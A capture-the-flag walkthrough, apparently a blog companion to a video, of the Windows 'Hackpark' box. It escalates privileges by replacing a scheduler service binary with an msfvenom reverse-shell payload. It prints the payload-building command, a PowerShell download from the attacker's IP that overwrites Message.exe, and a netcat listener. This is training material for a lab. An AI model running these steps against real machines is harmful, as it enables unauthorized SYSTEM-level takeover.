CHALLENGE OVERVIEW
- Link: hackpark
- Difficulty: Medium
- Target:
user
androot
flags on a windows machine - Highlight: hijacking a system process to spawn a reverse shell
- Tools:
nmap
,dirb
,hydra
,burpsuite
,msfvenom
- Tags: RCE (remote code execution), Windows, Winpeas
BACKGROUND

In this walkthrough, we will continue to build on our work in Hackpark I, but this time we will solve the box again without Metasploit.
The general approach will be to use winpeas
to automate local enumeration of the server. We’ll review the results of winpeas
and continue our privilege escalation by spoofing a system process and throwing an NT System Authority reverse shell (aka Windows root shell!).
Watching the first few minutes of the video might be a good review of Hackpark part I, because I quickly go through the final steps of the foothold stage below, starting with payload creation using msfvenom
, and then I slow down again for the privilege escalation stage without using Metasploit.
ATTACK MAP
We’ll be picking up on the box from the alternative privesc
attack vector shown below (Method 2)

SPIN UP AN FTP SERVER TO TRANSFER WINPEAS TO TARGET
Issue the following command to spin up a simple server from the directory that holds the winpeas.exe
file:
python3 -m http.server
LOCAL RECON WITH WINPEAS

Run winpeas
now:
winpeas.exe

TEST OUT THE AUTO-LOADING USER:PASS COMBO WITH REMOTE DESKTOP

Let’s follow up on Winpeas’ first interesting finding. We attempt to log in to the server using the remote desktop protocol (RDP) autologin credentials.
Unfortunately, this turns out to be a dead end. We’ll move on to other interesting findings
REVIEW INTERESTING FINDINGS

The other interesting finding from WinPEAS that jumps out at me is:
========================= WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running File Permissions: Everyone [WriteData/CreateFiles] Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles]) System Scheduler Service Wrapper ========================================================================
It appears that there may be a DLL (dynamic link library) hijacking exploit opportunity with the windows system scheduler service.
The file is listed as being located in the folder: C:\Program Files (x86)\SystemScheduler
. Let’s navigate there in our terminal to see what files might be running a service. On Windows, these files will usually .exe
filetypes.

It looks like the Message.exe
file might be the service we need to spoof.
Going forward, we will replace the file with our own malicious payload to spawn a reverse shell. We are hoping that the user NT SYSTEM AUTHORITY will be the one that runs the Message.exe
file, so that the reverse shell will give us full root privileges.
CREATE A REVSHELL WITH MSFVENOM
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe
EXPLOIT THE MACHINE BY SPOOFING A WINDOWS SERVICE

Let’s copy payload.php
over to the windows machine’s and rename it as Message.exe
, and place it in the directory C:\Program Files (x86)\SystemScheduler
in two easy steps:
- Check to see if the simple HTTP server is still running on port 8000 of the attack machine in the folder that contains
payload.exe
. If the file location is different from the server, movepayload.exe
to the current folder that is being served. - Copy the file over to the target machine as
Message.exe
and place it in the correctSystemScheduler
folder by issuing the following command on Windows:
powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
FIRE UP A NETCAT LISTENER TO CATCH THE REVSHELL
nc -lnvp 9999
(or whatever port you specified in the msfvenom
reverse shell payload)
And now, waiting a few seconds, we should catch our revshell and confirm that we are Windows NT Authority. We can easily retrieve both flags now using the “type
” command and finish off the box!

FINAL THOUGHTS

This box was one of the more challenging ones I’ve done yet.
It pushed me to chain together the use of several tools that I’ve used in more simple circumstances but never together. With each new hacking challenge completed, I am finding it easier to understand more complex attack vectors.
The details of decrypting hashes, copying files using HTTP servers, and searching for files and privilege escalation pathways on a target system might seem like a lot to grapple with, but with repetition comes familiarity and the logic of each attack starts to become more obvious.
Thanks for reading my walkthrough! Please let me know in the comments of the youtube video what you thought of today’s tutorial.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.